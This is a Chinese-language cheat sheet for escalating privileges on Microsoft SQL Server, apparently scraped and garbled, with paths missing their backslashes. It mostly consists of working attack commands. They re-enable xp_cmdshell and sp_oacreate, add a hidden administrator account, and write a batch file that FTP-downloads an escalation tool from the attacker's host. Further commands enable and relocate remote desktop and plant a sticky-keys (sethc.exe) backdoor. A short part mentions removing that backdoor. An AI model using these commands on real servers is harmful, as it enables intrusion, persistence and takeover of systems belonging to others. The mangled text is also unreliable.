1、)net net1都被禁用xcopy taskmgr.exe sethc.exe /y)如果cmd被禁用net user user pass /add除了xplog70.dll其他的都可以用这命令修复第一步先删除:drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc xp_cmdshell服务器: 消息 3701,级别 11,状态 5,行 1无法 除去 过程 sp_addextendedproc,因为它在系统目录中不存在。 消息 3701,级别 11,状态 5,过程 sp_dr
2、opextendedproc,行 18第二步恢复:dbcc addextendedproc (sp_oacreate,odsole70.dll) xp_cmdshellxplog70.dll直接恢复,不管sp_addextendedproc是不是存在 1.未能找到存储过程master.xpcmdshell之解决方法:EXEC sp_addextendedproc xp_cmdshell,dllname =xplog70.dlldeclare o intsp_addextendedproc xpsql70.dll恢复sp_addextendedproc语句:create procedure sp
3、_addextendedproc - 1996/08/30 20:13functname nvarchar(517),/* (owner.)name of function to call */dllname varchar(255)/* name of DLL containing function */asset implicit_transactions offif trancount 0beginraiserror(15002,-1,-1,return (1)enddbcc addextendedproc( functname, dllname)return (0) - sp_adde
4、xtendedprocGO2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。恢复方法:查询分离器连接后,sp_dropextendedproc , 修复XPLOG70.DLL(先用文件查看下备份的目录下x86bin,然后把下面目录替换)第一步第二步c:sql2ksp4x86binnxplog70.dll126 错误127 错误exec sp_addextendedproc Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dllProgram FilesMicrosoft SQL Serve
5、rMSSQLBinnxplog70.dll4.直接添加帐户法删除odsole70.dll:exec master.sp_dropextendedproc sp_oamethodexec master.sp_dropextendedproc sp_oacreate恢复odsole70.dll:exec sp_addextendedproc sp_OAMethod,odsole70.dllexec sp_addextendedproc sp_OACreate,直接添加帐户命令:declare shell int exec sp_oacreate wscript.shell,shell output
6、 exec sp_oamethod shell,run,null,windowssystem32cmd.exe /c net user sin sinhack /add,shell output exec sp_oamethod shell,windowssystem32cmd.exe/c net localgroup administrators sin /addFTP下载命令declare o int, f int, t int, ret intexec sp_oacreate scripting.filesystemobject, o outexec sp_oamethod o, cre
7、atetextfile, f out, 1.bat, 1exec ret = sp_oamethod f, writeline, NULL,open IPftp账号ftp密码get en.exe(无net提权脚本)c:en.exebye3、net提权出现 拒绝访问错误5 (重点)这种情况就不用尝试net1了,可以试试copy shift后门,如果copy后提示复制0文件,证明没有成功。那么可以试试能不能上传,如果能上传直接传个前段时间出来的无net提权工具,然后加个用户就可以了。但是这种情况大部分都是不能上传的,那么就要考虑一下了。既然能执行cmd,那么就能通过cmd下ftp下载文件,可是ft
8、p前提是要能写进文本或批处理。那么就可以通过sql语句写进一个文本或批处理啊。查询分析器执行成功后,不出意外,会在c盘出现一个1.bat(如果执行成功了,c盘却没有,可以换个文件夹写入,因为哪个服务器c盘根目录禁止写入)然后cmd执行ftp -s:1.bat这个执行完了以后,就会在c盘ftp下载一个无net提权脚本 或者直接写个vbs提权脚本1.vbsSet o=CreateObject( Shell.Users )Set z=o.create(用户z.changePassword 密码z.setting(AccountType)=3然后cmd执行cscript c:1.vbs 就可以了Cmd
9、 命令开3389:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f1.查询终端端口REG query HKLMSYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp /v PortNumber2.开启XP&2003终端服务Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3.更改终端端口为2008(0x7d8)默认
10、为3389(0xD3D)ServerWdsrdpwdTdstcp /v PortNumber /t REG_DWORD /d 0x7d8 /fServerWinStationsRDP-Tcp /v PortNumber /t REG_DWORD /d 0x7D8 /f4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制REG ADD HKLMSYSTEMCurrentControlSetServicesSharedAccessParametersFirewallPolicyStandardProfileGloballyOpenPortsList /v 3389:TCP /t REG
11、_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /fsql语句开3389开3389:exec master.dbo.xp_regwriteHKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerfDenyTSConnectionsREG_DWORD,0;- 关3389:,1;查看3389端口exec xp_regread SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber查看系统版本typ
12、e c:boot.ini普通CMD后门xp_regwrite SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exedebuggerreg_szwindowssystem32cmd.exe5下shift后门命令, o out copyfilewindowsexplorer.exe ,windowssystem32sethc.exewindowssystem32dllcachesethc.execopy c:windowsexplorer.exe c:windowssystem32sethc.e
13、xewindowssystem32sethc.exe c:windowssystem32dllcachesethc.exe5.恢复时一些常用的SQL语句:利用sp_addextendedproc恢复大部分常用存储扩展(得先利用最顶上的语句恢复自己):use masterexec sp_addextendedproc xp_cmdshell,xp_cmdshell.dllexec sp_addextendedproc xp_dirtree,xpstar.dllexec sp_addextendedproc xp_enumgroups,exec sp_addextendedproc xp_fixe
14、ddrives,exec sp_addextendedproc xp_loginconfig,exec sp_addextendedproc xp_enumerrorlogs,exec sp_addextendedproc xp_getfiledetails,exec sp_addextendedproc sp_OADestroy,exec sp_addextendedproc sp_OAGetErrorInfo,exec sp_addextendedproc sp_OAGetProperty,exec sp_addextendedproc sp_OASetProperty,exec sp_a
15、ddextendedproc sp_OAStop,exec sp_addextendedproc xp_regaddmultistring,exec sp_addextendedproc xp_regdeletekey,exec sp_addextendedproc xp_regdeletevalue,exec sp_addextendedproc xp_regenumvalues,exec sp_addextendedproc xp_regread,exec sp_addextendedproc xp_regremovemultistring,exec sp_addextendedproc
16、xp_regwrite,exec sp_addextendedproc xp_availablemedia,恢复cmdshell:exec sp_addextendedproc xp_cmdshell ,dllname =1.sql命令查询注册表粘滞键是否被劫持exec master.xp_regread Debugger2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令), REG_SZWINDOWSsystem32taskmgr.exe3.sql命令删除注册表粘滞键的劫持功能保护你的服务器不再被他人利用xp_regdeletekey SQL Server 阻止了对组件 的 过程sys.xp_cmdshell 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 。有关启用 的详细信息,请参阅 SQL Server 联机丛书中的 外围应用配置器EXEC sp_configure show advanced options, 1 - RECONFIGURE WITH OVERRIDE - EXEC sp_configure , 0 - 分析器执行的语句:, 1;RECONFIGURE;xpsql.cpp: 错误 5 来自 CreateProces
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1